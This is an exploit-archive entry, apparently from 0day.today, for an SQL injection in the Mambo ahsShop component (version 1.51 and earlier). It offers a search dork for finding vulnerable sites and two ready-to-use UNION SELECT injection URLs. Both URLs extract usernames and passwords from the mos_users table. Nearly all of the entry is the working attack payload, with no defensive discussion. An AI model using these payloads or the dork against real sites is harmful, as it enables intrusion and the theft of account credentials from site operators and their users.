id: 2795
date: 03/31/2008
title: Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability
author: S@BUN
cves: 

==================================================================
Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability
==================================================================



##########################################
#
# Mambo Component com_ahsshop SQL Injection
#
###########################################
#
# DORK 1 : allinurl: "com_ahsshop"do=default
#
###########################################
EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*


###########################################



#  0day.today [2023-03-23]  #